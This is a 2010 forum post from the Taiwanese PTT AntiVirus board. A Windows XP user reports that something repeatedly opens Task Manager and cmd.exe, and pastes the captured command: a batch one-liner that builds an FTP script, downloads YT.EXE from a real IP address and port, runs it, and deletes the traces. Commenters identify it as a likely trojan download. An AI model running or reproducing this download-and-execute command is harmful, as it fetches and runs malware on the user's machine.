PTT數位生活區 / AntiVirus (防毒)

[求救] 工作管理員+cmd自動執行

看板AntiVirus (防毒)作者時間15年前 (2010/11/15 01:04), 編輯推噓2(202)
留言4則, 3人參與, 最新討論串1/1
1. 敘述問題: 電腦會不定期的有一些行為, 桌布會先不見,之後自動開啟工作管理員, 接著利用它執行cmd.exe,然後在cmd下了一些指令, 有複製到一些,如下 CMD /C ECHO OPEN 112.104.40.69 40524 .. IK 7ECHO USER T G .. IK 7ECHO GET YT.EXE .. IK 7ECHO BYE .. IK 7FTP -N -V -S;IK 7DEL IK 7YT.EXE 7EXIT 電腦還是能正常跑,但是擔心是不是發生了什麼事情... 2. 系統資料: OS : Windows XP SP3 防毒軟體 : 小紅傘免費版 3. 分析報告: Combofix報告:http://sun.cis.scu.edu.tw/~92a39/upload/40712.txt Hijackthis :http://sun.cis.scu.edu.tw/~92a39/upload/40713.txt SRENG :http://sun.cis.scu.edu.tw/~92a39/upload/40714.txt 防毒軟體報告:沒有掃到毒 先謝謝各位了 T_T -- ※ 發信站: 批踢踢實業坊(ptt.cc) ◆ From: 112.104.77.156 ※ 編輯: Cellia 來自: 112.104.77.156 (11/15 01:06)
11/15 02:06, , 1F
看來是向 112.104.40.69:40524 這地方的 ftp 去抓檔
11/15 02:06, 1F
11/15 02:06, , 2F
這種很大機率是抓木馬...
11/15 02:06, 2F
11/15 19:56, , 3F
哭哭...可是小紅傘沒掃到毒我也不知道該怎麼辦了/_\
11/15 19:56, 3F
11/17 11:43, , 4F
解讀or重灌後,防火牆也裝一下
11/17 11:43, 4F
更多 Cellia 的文章
文章代碼(AID): #1Cu1QHex (AntiVirus)
AntiVirus 近期熱門文章
更多 近期熱門文章 >>
PTT數位生活區 即時熱門文章
更多 即時熱門文章 >>
更多 Cellia 的文章
文章代碼(AID): #1Cu1QHex (AntiVirus)